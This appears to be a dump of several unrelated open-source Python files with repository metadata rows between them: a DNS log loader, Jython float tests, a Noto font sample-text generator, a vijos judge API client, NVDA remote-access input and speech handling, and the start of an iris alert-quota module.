def delete_chunks(chunks,chunk_filepath_template):
logger.info("Cleaning up chunk files.")
for i in chunks:
chunk_filepath=chunk_filepath_template.format(i)
logger.debug('removing file: {0}'.format(chunk_filepath))
os.remove(chunk_filepath)
if __name__=='__main__':
logger.info('named.py starting')
#Set paths for archive and chunk directories
archive_dir=named_dir+'archive/'+src+'/'
chunk_dir=named_dir+'chunks/'+src+'/'
#Make sure the directories exist
try:
os.makedirs(archive_dir)
except OSError:
logger.debug('dir exists:{0}'.format(archive_dir))
try:
os.makedirs(chunk_dir)
except OSError:
logger.debug('dir exists:{0}'.format(chunk_dir))
#for each file in the to_load directory that is from the source defined in the config
# - Process file and create chunk files and archive file
# - Import the chunkfiles into database
# - Delete chunkfiles
# - Delete original file
files_to_load = glob.glob(named_dir+'to_load/{0}/*.{0}.log.gz'.format(src))
if len(files_to_load) == 0:
logger.warning('No files to load. Exiting')
exit(0)
logger.debug('files to load: {0}'.format(files_to_load))
for f in files_to_load:
uniq_set = set()
filepath=f
basename=os.path.basename(f).split('.log.gz')[0]
chunk_filepath_template=chunk_dir+basename+'.{0}.csv'
archive_filepath=archive_dir+basename+'.csv.gz'
num_chunks = proc_file(filepath,archive_filepath,chunk_filepath_template,chunksize)
import_chunks(xrange(num_chunks),chunk_filepath_template)
delete_chunks(xrange(num_chunks),chunk_filepath_template)
os.remove(f)
conn.close()
logger.info('named.py complete')
| gpl-3.0 | -2,595,943,497,486,646,300 | 32.514107 | 122 | 0.652418 | false | 3.681474 | true | false | false |
mosbasik/buzhug | javasrc/lib/Jython/Lib/test/test_float_jy.py | 9 | 4186 | """Float tests
Made for Jython.
"""
import math
import sys
import unittest
from test import test_support
jython = test_support.is_jython
class FloatTestCase(unittest.TestCase):
def test_float_repr(self):
self.assertEqual(repr(12345678.000000005), '12345678.000000006')
self.assertEqual(repr(12345678.0000000005), '12345678.0')
self.assertEqual(repr(math.pi**-100),
jython and '1.9275814160560203e-50' or '1.9275814160560206e-50')
self.assertEqual(repr(-1.0), '-1.0')
self.assertEqual(repr(-9876.543210),
jython and '-9876.54321' or '-9876.5432099999998')
self.assertEqual(repr(0.123456789e+35), '1.23456789e+34')
def test_float_str(self):
self.assertEqual(str(12345678.000005), '12345678.0')
self.assertEqual(str(12345678.00005),
jython and '12345678.0' or '12345678.0001')
self.assertEqual(str(12345678.00005),
jython and '12345678.0' or '12345678.0001')
self.assertEqual(str(12345678.0005), '12345678.0005')
self.assertEqual(str(math.pi**-100), '1.92758141606e-50')
self.assertEqual(str(0.0), '0.0')
self.assertEqual(str(-1.0), '-1.0')
self.assertEqual(str(-9876.543210), '-9876.54321')
self.assertEqual(str(23456789012E666), 'inf')
self.assertEqual(str(-23456789012E666), '-inf')
def test_float_str_formatting(self):
self.assertEqual('%.13g' % 12345678.00005, '12345678.00005')
self.assertEqual('%.12g' % 12345678.00005,
jython and '12345678' or '12345678.0001')
self.assertEqual('%.11g' % 12345678.00005, '12345678')
# XXX: The exponential formatter isn't totally correct, e.g. our
# output here is really .13g
self.assertEqual('%.12g' % math.pi**-100, '1.92758141606e-50')
self.assertEqual('%.5g' % 123.005, '123')
self.assertEqual('%#.5g' % 123.005, '123.00')
self.assertEqual('%#g' % 0.001, '0.00100000')
self.assertEqual('%#.5g' % 0.001, '0.0010000')
self.assertEqual('%#.1g' % 0.0001, '0.0001')
self.assertEqual('%#.4g' % 100, '100.0')
self.assertEqual('%#.4g' % 100.25, '100.2')
self.assertEqual('%g' % 0.00001, '1e-05')
self.assertEqual('%#g' % 0.00001, '1.00000e-05')
self.assertEqual('%e' % -400.0, '-4.000000e+02')
self.assertEqual('%.2g' % 99, '99')
self.assertEqual('%.2g' % 100, '1e+02')
def test_overflow(self):
shuge = '12345' * 120
shuge_float = float(shuge)
shuge_int = int(shuge)
self.assertRaises(OverflowError, float, shuge_int)
self.assertRaises(OverflowError, int, shuge_float)
# and cmp should not overflow
self.assertNotEqual(0.1, shuge_int)
def test_nan(self):
nan = float('nan')
self.assert_(type(nan), float)
if jython:
# support Java syntax
self.assert_(type(float('NaN')), float)
# CPython 2.4/2.5 allow this
self.assertEqual(long(nan), 0)
self.assertNotEqual(nan, float('nan'))
self.assertNotEqual(nan, nan)
self.assertEqual(cmp(nan, float('nan')), 1)
self.assertEqual(cmp(nan, nan), 0)
for i in (-1, 1, -1.0, 1.0):
self.assertEqual(cmp(nan, i), -1)
self.assertEqual(cmp(i, nan), 1)
def test_infinity(self):
self.assert_(type(float('Infinity')), float)
self.assert_(type(float('inf')), float)
self.assertRaises(OverflowError, long, float('Infinity'))
def test_float_none(self):
self.assertRaises(TypeError, float, None)
def test_pow(self):
class Foo(object):
def __rpow__(self, other):
return other ** 2
# regression in 2.5 alphas
self.assertEqual(4.0 ** Foo(), 16.0)
def test_faux(self):
class F(object):
def __float__(self):
return 1.6
self.assertEqual(math.cos(1.6), math.cos(F()))
def test_main():
test_support.run_unittest(FloatTestCase)
if __name__ == '__main__':
test_main()
| bsd-3-clause | -1,937,611,315,161,537,500 | 36.375 | 89 | 0.580984 | false | 3.389474 | true | false | false |
googlefonts/nototools | nototools/generate_sample_from_exemplar.py | 3 | 21941 | #!/usr/bin/env python
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generates script-specific samples (collections of chars) using cldr
exemplar data for languages written in a script."""
import argparse
import codecs
import collections
import locale
import os
from os import path
from nototools.py23 import unichr
from nototools import cldr_data
from nototools import create_image
from nototools import extra_locale_data
from nototools import tool_utils
from nototools import unicode_data
try:
from icu import Locale, Collator
print("will use icu locale-specific order")
_HAVE_ICU = True
except ImportError as e:
print("will use default locale sort order")
_HAVE_ICU = False
NOTO_TOOLS = path.abspath(path.join(path.dirname(__file__), os.pardir))
CLDR_DIR = path.join(NOTO_TOOLS, "third_party", "cldr")
_VERBOSE = False
def get_script_to_exemplar_data_map():
"""Return a map from script to 3-tuples of:
- locale tuple (lang, script, region, variant)
- cldr_relative path to src of exemplar data
- tuple of the exemplar chars"""
script_map = collections.defaultdict(dict)
for directory in ["common", "seed", "exemplars"]:
data_dir = path.join(directory, "main")
for filename in os.listdir(path.join(CLDR_DIR, data_dir)):
if not filename.endswith(".xml"):
continue
exemplar_list = cldr_data.get_exemplar_from_file(
path.join(data_dir, filename)
)
if not exemplar_list:
if _VERBOSE:
print(" no exemplar list for %s" % path.join(data_dir, filename))
continue
lsrv = cldr_data.loc_tag_to_lsrv(filename[:-4])
if not lsrv:
if _VERBOSE:
print(" no lsrv for %s" % path.join(data_dir, filename))
continue
src = path.join(directory, filename)
script = lsrv[1]
if not script:
if _VERBOSE:
print(" no script for %s" % path.join(data_dir, filename))
continue
loc_tag = cldr_data.lsrv_to_loc_tag(lsrv)
loc_to_exemplar_info = script_map[script]
if loc_tag in loc_to_exemplar_info:
if _VERBOSE:
print(
"skipping %s, already have exemplars for %s from %s"
% (src, loc_tag, loc_to_exemplar_info[loc_tag][1])
)
continue
# fix exemplars that look incorrect
if script == "Arab" and "d" in exemplar_list:
if _VERBOSE:
print("found 'd' in %s for %s" % (src, lsrv))
no_latin = True
else:
no_latin = False
# exclude exemplar strings, and restrict to letters and digits
def accept_cp(cp):
if len(cp) != 1:
return False
cat = unicode_data.category(cp)
if cat[0] != "L" and cat != "Nd":
return False
if no_latin and cp in "df":
return False
return True
filtered_exemplar_list = filter(accept_cp, exemplar_list)
# some exemplar lists don't surround strings with curly braces, and end up
# with duplicate characters. Flag these
exemplar_chars = set()
dup_chars = set()
fixed_exemplar_list = []
for cp in filtered_exemplar_list:
if cp in exemplar_chars:
dup_chars.add(cp)
else:
exemplar_chars.add(cp)
fixed_exemplar_list.append(cp)
if len(dup_chars) > 0 and _VERBOSE:
print(
"duplicate exemplars in %s: %s"
% (
src,
", ".join(
[u"\u200e%s\u200e (%x)" % (cp, ord(cp)) for cp in dup_chars]
),
)
)
loc_to_exemplar_info[loc_tag] = (lsrv, src, tuple(fixed_exemplar_list))
# supplement with extra locale data
for loc_tag in extra_locale_data.EXEMPLARS:
exemplar_list = cldr_data.get_exemplar_from_extra_data(loc_tag)
lang, script = loc_tag.split("-")
lsrv = (lang, script, None, None)
loc_to_exemplar_info = script_map[script]
src = "[extra locale data]/%s" % loc_tag
if loc_tag in loc_to_exemplar_info:
if _VERBOSE:
print(
"skipping %s, already have exemplars for %s from %s"
% (src, loc_tag, loc_to_exemplar_info[loc_tag][1])
)
continue
# restrict to letters, except for zsym
def accept_cp(cp):
cat = unicode_data.category(cp)
return cat[0] == "L" or cat == "Nd"
if "Zsym" not in loc_tag:
            filtered_exemplar_list = list(filter(accept_cp, exemplar_list))
if len(filtered_exemplar_list) != len(exemplar_list) and _VERBOSE:
print("filtered some characters from %s" % src)
else:
filtered_exemplar_list = exemplar_list
loc_to_exemplar_info[loc_tag] = (lsrv, src, tuple(filtered_exemplar_list))
return script_map
def show_rarely_used_char_info(script, loc_map, char_to_lang_map):
# let's list chars unique to each language
for loc_tag in sorted(loc_map):
unique_chars = []
dual_chars = []
dual_shared_with = set()
triple_chars = []
triple_shared_with = set()
info = loc_map[loc_tag]
exemplars = info[2]
for cp in exemplars:
num_common_langs = len(char_to_lang_map[cp])
if num_common_langs == 1:
unique_chars.append(cp)
elif num_common_langs == 2:
dual_chars.append(cp)
for shared_loc_tag in char_to_lang_map[cp]:
if shared_loc_tag != loc_tag:
dual_shared_with.add(shared_loc_tag)
elif num_common_langs == 3:
triple_chars.append(cp)
for shared_loc_tag in char_to_lang_map[cp]:
if shared_loc_tag != loc_tag:
triple_shared_with.add(shared_loc_tag)
script_tag = "-" + script
if unique_chars:
print(
"%s has %d unique chars: %s%s"
% (
loc_tag,
len(unique_chars),
" ".join(unique_chars[:100]),
"..." if len(unique_chars) > 100 else "",
)
)
if dual_chars:
print(
"%s shares %d chars (%s%s) with 1 other lang: %s"
% (
loc_tag,
len(dual_chars),
" ".join(dual_chars[:20]),
"..." if len(dual_chars) > 20 else "",
", ".join(
sorted(
[loc.replace(script_tag, "") for loc in dual_shared_with]
)
),
)
)
if triple_chars:
print(
"%s shares %d chars (%s%s) with 2 other langs: %s"
% (
loc_tag,
len(triple_chars),
" ".join(triple_chars[:20]),
"..." if len(triple_chars) > 20 else "",
", ".join(
sorted(
[loc.replace(script_tag, "") for loc in triple_shared_with]
)
),
)
)
if not (unique_chars or dual_chars or triple_chars):
print("%s shares all chars with 3+ other langs" % loc_tag)
def get_char_to_lang_map(loc_map):
char_to_lang_map = collections.defaultdict(list)
for loc_tag in sorted(loc_map):
info = loc_map[loc_tag]
exemplars = info[2]
for cp in exemplars:
if loc_tag in char_to_lang_map[cp]:
print(
"loc %s (from %s) already in char_to_lang_map for %s (%x)"
% (loc_tag, info[1], cp, ord(cp))
)
else:
char_to_lang_map[cp].append(loc_tag)
return char_to_lang_map
def char_lang_info(num_locales, char_to_lang_map):
"""Returns a tuple containing
- characters ordered by the number of langs that use them
- a list mapping number of shared langs to number of chars shared by those langs"""
freq_list = []
hist = [0] * (num_locales + 1)
for cp in char_to_lang_map:
num_shared_langs = len(char_to_lang_map[cp])
if num_shared_langs >= len(hist):
for shared_lang in char_to_lang_map[cp]:
if shared_lang not in loc_map:
print("loc map does not have '%s'!" % shared_lang)
freq_list.append((num_shared_langs, cp))
if num_shared_langs >= len(hist):
print(
"num shared langs is %d but size of hist is %d"
% (num_shared_langs, len(hist))
)
hist[num_shared_langs] += 1
freq_list.sort()
return [cp for nl, cp in freq_list], hist
def show_char_use_info(script, chars_by_num_langs, char_to_lang_map):
script_tag = "-" + script
for cp in chars_by_num_langs:
langs = char_to_lang_map[cp]
count = len(langs)
limit = 12
without_script = [loc.replace(script_tag, "") for loc in langs[:limit]]
without_script_str = ", ".join(sorted(without_script))
if count > limit:
without_script_str += "..."
print(u"char %s\u200e (%x): %d %s" % (cp, ord(cp), count, without_script_str))
print("total chars listed: %d" % len(char_to_lang_map))
def show_shared_langs_hist(hist):
# histogram - number of chars per number of shared languages
for i in range(1, len(hist)):
print("[%3d] %3d %s" % (i, hist[i], "x" * hist[i]))
def get_upper_case_list(char_list):
"""Return the upper case versions where they differ.
If no char in the list is a lower case variant, the result is empty."""
# keep in same order as input list.
upper_case_chars = []
for cp in char_list:
upcp = unicode_data.to_upper(cp)
if upcp != cp:
upper_case_chars.append(upcp)
return upper_case_chars
def show_tiers(char_list, num_tiers, tier_size):
for tier in range(1, num_tiers + 1):
if tier == 1:
subset = char_list[-tier_size:]
else:
subset = char_list[tier * -tier_size : (tier - 1) * -tier_size]
if not subset:
break
tier_chars = sorted(subset)
print("tier %d: %s" % (tier, " ".join(tier_chars)))
upper_case_chars = get_upper_case_list(tier_chars)
if upper_case_chars:
print(" upper: " + " ".join(upper_case_chars))
def get_rare_char_info(char_to_lang_map, shared_lang_threshold):
"""Returns a tuple of:
- a set of 'rare_chars' (those used threshold langs or fewer),
- a mapping from each locale with rare chars to a set of its rare chars"""
rare_chars = set()
locs_with_rare_chars = collections.defaultdict(set)
for cp in char_to_lang_map:
num_shared_langs = len(char_to_lang_map[cp])
if num_shared_langs <= shared_lang_threshold:
rare_chars.add(cp)
for lang_tag in char_to_lang_map[cp]:
locs_with_rare_chars[lang_tag].add(cp)
return rare_chars, locs_with_rare_chars
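# Lazily-built cache mapping each script to its most widely used language,
# ordered by decreasing literate population (see _init_lang_for_script_map).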
_lang_for_script_map = {}
def _init_lang_for_script_map():
locs_by_lit_pop = [
loc for _, loc in cldr_data.get_lang_scrs_by_decreasing_global_lit_pop()
]
for t in locs_by_lit_pop:
lsrv = cldr_data.loc_tag_to_lsrv(t)
script = lsrv[1]
if script not in _lang_for_script_map:
lang = lsrv[0]
# print('%s lang => %s' % (script, lang))
_lang_for_script_map[script] = lang
def lang_for_script(script):
"""Return the most common language for a script based on literate population."""
# should use likely subtag data for this.
# the current code assumes all we want is lang -> script, I'd have to change
# it to map locale->locale. Right now I dont' get Hant -> zh_Hant, only
# Hant -> zh, which isn't good enough I think.
if not _lang_for_script_map:
_init_lang_for_script_map()
return _lang_for_script_map.get(script)
def select_rare_chars_for_loc(
script, locs_with_rare_chars, shared_lang_threshold, char_to_lang_map
):
"""Return a list of 2-tuples of loc and selected rare chars,
ordered by decreasing literate population of the locale."""
rarity_threshold_map = {}
for lang_tag in locs_with_rare_chars:
rarity_threshold_map[lang_tag] = shared_lang_threshold
selected = []
locs_by_lit_pop = [
loc for _, loc in cldr_data.get_lang_scrs_by_decreasing_global_lit_pop()
]
# examine locales in decreasing order of literate population
for loc_tag in locs_by_lit_pop:
if script not in loc_tag:
continue
loc_tag = loc_tag.replace("_", "-")
if loc_tag not in locs_with_rare_chars:
continue
most_specific_chars = set()
most_specific_chars_count = rarity_threshold_map[loc_tag]
# From the rare chars for this locale, select those that
# are most specific to this language. In most cases they
# are unique to this language.
for cp in locs_with_rare_chars[loc_tag]:
num_chars = len(char_to_lang_map[cp])
if num_chars <= most_specific_chars_count:
if num_chars < most_specific_chars_count:
most_specific_chars = set()
most_specific_chars.add(cp)
most_specific_chars_count = num_chars
if most_specific_chars:
selected.append((loc_tag, most_specific_chars))
for cp in most_specific_chars:
for tag in char_to_lang_map[cp]:
if rarity_threshold_map[tag] > most_specific_chars_count:
rarity_threshold_map[tag] = most_specific_chars_count
return selected
def show_selected_rare_chars(selected):
print("langs with rare chars by lang pop:")
for lang_tag, chars in selected:
print("%10s: %s" % (lang_tag, ", ".join(sorted(chars))))
def sort_for_script(cp_list, script):
lang = lang_for_script(script)
if not lang:
print("cannot sort for script, no lang for %s" % script)
return cp_list
if _HAVE_ICU:
from icu import Locale, Collator
loc = Locale(lang + "_" + script)
col = Collator.createInstance(loc)
return sorted(cp_list, cmp=col.compare)
else:
import locale
return sorted(cp_list, cmp=locale.strcoll)
def addcase(sample, script):
cased_sample = []
for cp in sample:
ucp = unicode_data.to_upper(cp)
if ucp != cp and ucp not in sample: # Copt has cased chars paired in the block
cased_sample.append(ucp)
if cased_sample:
cased_sample = " ".join(cased_sample)
if _VERBOSE:
print("add case for %s" % script)
return sample + "\n" + cased_sample
return sample
def _generate_excluded_characters():
# Some of these exclusions are desired, and some are reluctantly applied because
# Noto currently does not support some characters. We use the generated
# data as fallback samples on a per-script and not per-font basis, which is also
# a problem.
# Religious characters
# deva OM, Arabic pbuh, bismillah
codepoints = [0x950, 0xFDFA, 0xFDFD]
# Cyrillic characters not in sans or serif
codepoints.append(0x2E2F)
for cp in range(0xA640, 0xA680):
codepoints.append(cp)
# Arabic character not in kufi
codepoints.append(0x08A0)
chars = set()
for cp in codepoints:
chars.add(unichr(cp))
return frozenset(chars)
_EXCLUDE_CHARS = _generate_excluded_characters()
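# Build the sample string and a short info caption for one script, merging the
# per-locale exemplar data and preferring characters shared by many languages.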
def generate_sample_for_script(script, loc_map):
num_locales = len(loc_map)
if num_locales == 1:
        tag, info = next(iter(loc_map.items()))
exemplars = info[2]
ex_len = len(exemplars)
info = "%s (1 locale)\nfrom exemplars for %s (%s%d chars)" % (
script,
tag,
"first 60 of " if ex_len > 60 else "",
ex_len,
)
# don't sort, rely on exemplar order
sample = " ".join(exemplars[:60])
sample = addcase(sample, script)
return sample, info
script_tag = "-" + script
char_to_lang_map = get_char_to_lang_map(loc_map)
if len(char_to_lang_map) <= 60:
info = "%s (%d locales)\nfrom merged exemplars (%d chars) from %s" % (
script,
num_locales,
len(char_to_lang_map),
", ".join([loc.replace(script_tag, "") for loc in loc_map]),
)
sample = " ".join(sort_for_script(list(char_to_lang_map), script))
sample = addcase(sample, script)
return sample, info
# show_rarely_used_char_info(script, loc_map, char_to_lang_map)
chars_by_num_langs, num_langs_to_num_chars = char_lang_info(
num_locales, char_to_lang_map
)
# show_char_use_info(chars_by_num_langs, char_to_lang_map)
# show_shared_langs_hist(num_langs_to_num_chars)
# show_tiers(chars_by_num_langs, 3, 40)
shared_lang_threshold = min(7, num_locales)
rare_chars, locs_with_rare_chars = get_rare_char_info(
char_to_lang_map, shared_lang_threshold
)
selected = select_rare_chars_for_loc(
script, locs_with_rare_chars, shared_lang_threshold, char_to_lang_map
)
# show_selected_rare_chars(selected)
chars_by_num_langs = [cp for cp in chars_by_num_langs if cp not in _EXCLUDE_CHARS]
chosen_chars = list(chars_by_num_langs)[-60:]
rare_extension = []
for _, chars in selected:
avail_chars = [
cp
for cp in chars
if cp not in chosen_chars
and cp not in rare_extension
and cp not in _EXCLUDE_CHARS
]
rare_extension.extend(
sorted(avail_chars)[:4]
) # vietnamese dominates latin otherwise
if len(rare_extension) > 20:
break
chosen_chars = chosen_chars[: 60 - len(rare_extension)]
chosen_chars.extend(rare_extension)
info = (
"%s (%d locales)\n"
"from most common exemplars plus chars specific to most-read languages"
% (script, num_locales)
)
sample = " ".join(sort_for_script(chosen_chars, script))
sample = addcase(sample, script)
return sample, info
def generate_samples(dstdir, imgdir, summary):
if imgdir:
imgdir = tool_utils.ensure_dir_exists(imgdir)
print("writing images to %s" % imgdir)
if dstdir:
dstdir = tool_utils.ensure_dir_exists(dstdir)
print("writing files to %s" % dstdir)
verbose = summary
script_map = get_script_to_exemplar_data_map()
for script in sorted(script_map):
sample, info = generate_sample_for_script(script, script_map[script])
if summary:
print()
print(info)
print(sample)
if imgdir:
path = os.path.join(imgdir, "und-%s_chars.png" % script)
print("writing image %s.png" % script)
rtl = script in ["Adlm", "Arab", "Hebr", "Nkoo", "Syrc", "Tfng", "Thaa"]
create_image.create_png(
sample, path, font_size=34, line_spacing=40, width=800, rtl=rtl
)
if dstdir:
filename = "und-%s_chars.txt" % script
print("writing data %s" % filename)
filepath = os.path.join(dstdir, filename)
with codecs.open(filepath, "w", "utf-8") as f:
f.write(sample + "\n")
def main():
default_dstdir = os.path.join(NOTO_TOOLS, "sample_texts")
parser = argparse.ArgumentParser()
parser.add_argument(
"--dstdir",
help="where to write samples (default %s)" % default_dstdir,
default=default_dstdir,
metavar="dir",
)
parser.add_argument(
"--imgdir", help="if defined, generate images in this dir", metavar="dir"
)
parser.add_argument(
"--save", help="write sample files in dstdir", action="store_true"
)
parser.add_argument(
"--summary",
help="output list of samples and how they were generated",
action="store_true",
)
parser.add_argument(
"--verbose", help="print warnings and extra info", action="store_true"
)
args = parser.parse_args()
if not args.save and not args.imgdir and not args.summary:
print("nothing to do.")
return
if args.verbose:
global _VERBOSE
_VERBOSE = True
generate_samples(args.dstdir if args.save else None, args.imgdir, args.summary)
if __name__ == "__main__":
locale.setlocale(locale.LC_COLLATE, "en_US.UTF-8")
main()
| apache-2.0 | -1,551,522,691,316,249,600 | 33.771791 | 88 | 0.557996 | false | 3.630212 | false | false | false |
vijos/jd4 | jd4/api.py | 1 | 5806 | import json
from aiohttp import ClientSession, CookieJar
from asyncio import CancelledError, Queue, get_event_loop
from appdirs import user_config_dir
from os import path
from urllib.parse import urljoin
from jd4.log import logger
_CHUNK_SIZE = 32768
_CONFIG_DIR = user_config_dir('jd4')
_COOKIES_FILE = path.join(_CONFIG_DIR, 'cookies')
_COOKIE_JAR = CookieJar(unsafe=True)
try:
_COOKIE_JAR.load(_COOKIES_FILE)
except FileNotFoundError:
pass
class VJ4Error(Exception):
def __init__(self, name, message, *args):
super().__init__(name, message, *args)
self.name = name
async def json_response_to_dict(response):
if response.content_type != 'application/json':
raise Exception('invalid content type ' + response.content_type)
response_dict = await response.json()
if 'error' in response_dict:
error = response_dict['error']
raise VJ4Error(error.get('name', 'unknown'),
error.get('message', ''),
*error.get('args', []))
return response_dict
class VJ4Session(ClientSession):
def __init__(self, server_url):
super().__init__(cookie_jar=_COOKIE_JAR)
self.server_url = server_url
def full_url(self, *parts):
return urljoin(self.server_url, path.join(*parts))
async def get_json(self, relative_url, **kwargs):
async with self.get(self.full_url(relative_url),
headers={'accept': 'application/json'},
allow_redirects=False,
params=kwargs) as response:
return await json_response_to_dict(response)
async def post_json(self, relative_url, **kwargs):
async with self.post(self.full_url(relative_url),
headers={'accept': 'application/json'},
allow_redirects=False,
data=kwargs) as response:
return await json_response_to_dict(response)
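    # Long-lived judge loop: queue requests arriving on the websocket and let a
    # single worker task handle them in order via handler_type.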
async def judge_consume(self, handler_type):
async with self.ws_connect(self.full_url('judge/consume-conn/websocket')) as ws:
logger.info('Connected')
queue = Queue()
async def worker():
try:
while True:
request = await queue.get()
await handler_type(self, request, ws).handle()
except CancelledError:
raise
except Exception as e:
logger.exception(e)
await ws.close()
worker_task = get_event_loop().create_task(worker())
try:
while True:
queue.put_nowait(await ws.receive_json())
except TypeError:
pass
logger.warning('Connection lost with code %s', ws.close_code)
worker_task.cancel()
try:
await worker_task
except CancelledError:
pass
async def judge_noop(self):
await self.get_json('judge/noop')
async def login(self, uname, password):
logger.info('Login')
await self.post_json('login', uname=uname, password=password)
async def login_if_needed(self, uname, password):
try:
await self.judge_noop()
logger.info('Session is valid')
except VJ4Error as e:
if e.name == 'PrivilegeError':
await self.login(uname, password)
await get_event_loop().run_in_executor(
None, lambda: _COOKIE_JAR.save(_COOKIES_FILE))
else:
raise
async def judge_datalist(self, last):
return await self.get_json('judge/datalist', last=last)
async def problem_data(self, domain_id, pid, save_path):
logger.info('Getting problem data: %s, %s', domain_id, pid)
loop = get_event_loop()
async with self.get(self.full_url('d', domain_id, 'p', pid, 'data'),
headers={'accept': 'application/json'}) as response:
if response.content_type == 'application/json':
response_dict = await response.json()
if 'error' in response_dict:
error = response_dict['error']
raise VJ4Error(error.get('name', 'unknown'),
error.get('message', ''),
*error.get('args', []))
raise Exception('unexpected response')
if response.status != 200:
raise Exception('http error ' + str(response.status))
with open(save_path, 'wb') as save_file:
while True:
buffer = await response.content.read(_CHUNK_SIZE)
if not buffer:
break
await loop.run_in_executor(None, save_file.write, buffer)
async def record_pretest_data(self, rid):
logger.info('Getting pretest data: %s', rid)
async with self.get(self.full_url('records', rid, 'data'),
headers={'accept': 'application/json'}) as response:
if response.content_type == 'application/json':
response_dict = await response.json()
if 'error' in response_dict:
error = response_dict['error']
raise VJ4Error(error.get('name', 'unknown'),
error.get('message', ''),
*error.get('args', []))
raise Exception('unexpected response')
if response.status != 200:
raise Exception('http error ' + str(response.status))
return await response.read()
| agpl-3.0 | 3,391,138,550,875,149,300 | 39.887324 | 88 | 0.539786 | false | 4.391831 | false | false | false |
NVDARemote/NVDARemote | addon/globalPlugins/remoteClient/local_machine.py | 1 | 3437 | import os
import wx
from . import input
import api
import nvwave
import tones
import speech
import ctypes
import braille
import inputCore
try:
from systemUtils import hasUiAccess
except ModuleNotFoundError:
from config import hasUiAccess
import ui
import versionInfo
import logging
logger = logging.getLogger('local_machine')
def setSpeechCancelledToFalse():
"""
This function updates the state of speech so that it is aware that future
speech should not be cancelled. In the long term this is a fragile solution
as NVDA does not support modifying the internal state of speech.
"""
if versionInfo.version_year >= 2021:
# workaround as beenCanceled is readonly as of NVDA#12395
speech.speech._speechState.beenCanceled = False
else:
speech.beenCanceled = False
class LocalMachine:
def __init__(self):
self.is_muted = False
self.receiving_braille=False
def play_wave(self, fileName):
"""Instructed by remote machine to play a wave file."""
if self.is_muted:
return
if os.path.exists(fileName):
# ignore async / asynchronous from kwargs:
# playWaveFile should play asynchronously from NVDA remote.
nvwave.playWaveFile(fileName=fileName, asynchronous=True)
def beep(self, hz, length, left, right, **kwargs):
if self.is_muted:
return
tones.beep(hz, length, left, right)
def cancel_speech(self, **kwargs):
if self.is_muted:
return
wx.CallAfter(speech._manager.cancel)
def speak(
self,
sequence,
priority=speech.priorities.Spri.NORMAL,
**kwargs
):
if self.is_muted:
return
setSpeechCancelledToFalse()
wx.CallAfter(speech._manager.speak, sequence, priority)
def display(self, cells, **kwargs):
if self.receiving_braille and braille.handler.displaySize > 0 and len(cells) <= braille.handler.displaySize:
# We use braille.handler._writeCells since this respects thread safe displays and automatically falls back to noBraille if desired
cells = cells + [0] * (braille.handler.displaySize - len(cells))
wx.CallAfter(braille.handler._writeCells, cells)
def braille_input(self, **kwargs):
try:
inputCore.manager.executeGesture(input.BrailleInputGesture(**kwargs))
except inputCore.NoInputGestureAction:
pass
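	# Use the smallest non-zero size offered by any machine in the session so
	# braille output fits every connected display.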
def set_braille_display_size(self, sizes, **kwargs):
sizes.append(braille.handler.display.numCells)
try:
size=min(i for i in sizes if i>0)
except ValueError:
size = braille.handler.display.numCells
braille.handler.displaySize = size
braille.handler.enabled = bool(size)
def send_key(self, vk_code=None, extended=None, pressed=None, **kwargs):
wx.CallAfter(input.send_key, vk_code, None, extended, pressed)
def set_clipboard_text(self, text, **kwargs):
api.copyToClip(text=text)
def send_SAS(self, **kwargs):
"""
This function simulates as "a secure attention sequence" such as CTRL+ALT+DEL.
SendSAS requires UI Access, so we provide a warning when this fails.
This warning will only be read by the remote NVDA if it is currently connected to the machine.
"""
if hasUiAccess():
ctypes.windll.sas.SendSAS(0)
else:
# Translators: Sent when a user fails to send CTRL+ALT+DEL from a remote NVDA instance
ui.message(_("No permission on device to trigger CTRL+ALT+DEL from remote"))
logger.warning("UI Access is disabled on this machine so cannot trigger CTRL+ALT+DEL")
| gpl-2.0 | 3,369,433,582,321,457,000 | 28.963964 | 133 | 0.719814 | false | 3.314368 | false | false | false |
dwang159/iris-api | src/iris/sender/quota.py | 2 | 14107 | # Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
from time import time
from gevent import spawn, sleep
from gevent.lock import Semaphore
from collections import deque
from datetime import datetime
import iris.cache
from iris import metrics
import logging
import ujson
logger = logging.getLogger(__name__)
get_application_quotas_query = '''SELECT `application`.`name` as application,
`application_quota`.`hard_quota_threshold`,
`application_quota`.`soft_quota_threshold`,
`application_quota`.`hard_quota_duration`,
`application_quota`.`soft_quota_duration`,
`target`.`name` as target_name,
`target_type`.`name` as target_role,
`application_quota`.`plan_name`,
`application_quota`.`wait_time`
FROM `application_quota`
JOIN `application` ON `application`.`id` = `application_quota`.`application_id`
LEFT JOIN `target` on `target`.`id` = `application_quota`.`target_id`
LEFT JOIN `target_type` on `target_type`.`id` = `target`.`type_id` '''
insert_application_quota_query = '''INSERT INTO `application_quota` (`application_id`, `hard_quota_threshold`,
`soft_quota_threshold`, `hard_quota_duration`,
`soft_quota_duration`, `plan_name`,
`target_id`, `wait_time`)
VALUES (:application_id, :hard_quota_threshold, :soft_quota_threshold,
:hard_quota_duration, :soft_quota_duration, :plan_name, :target_id, :wait_time)
ON DUPLICATE KEY UPDATE `hard_quota_threshold` = :hard_quota_threshold,
`soft_quota_threshold` = :soft_quota_threshold,
`hard_quota_duration` = :hard_quota_duration,
`soft_quota_duration` = :soft_quota_duration,
`plan_name` = :plan_name,
`target_id` = :target_id,
`wait_time` = :wait_time'''
create_incident_query = '''INSERT INTO `incident` (`plan_id`, `created`, `context`, `current_step`, `active`, `application_id`)
VALUES ((SELECT `plan_id` FROM `plan_active` WHERE `name` = :plan_name),
:created, :context, 0, TRUE, :sender_app_id)'''
check_incident_claimed_query = '''SELECT `active` FROM `incident` WHERE `id` = :id'''
required_quota_keys = frozenset(['hard_quota_threshold', 'soft_quota_threshold',
'hard_quota_duration', 'soft_quota_duration',
'plan_name', 'wait_time', 'target_name'])
quota_int_keys = ('hard_quota_threshold', 'soft_quota_threshold',
'hard_quota_duration', 'soft_quota_duration', 'wait_time')
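# Minimum number of seconds between repeated soft-quota warnings for the same application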
soft_quota_notification_interval = 1800
class ApplicationQuota(object):
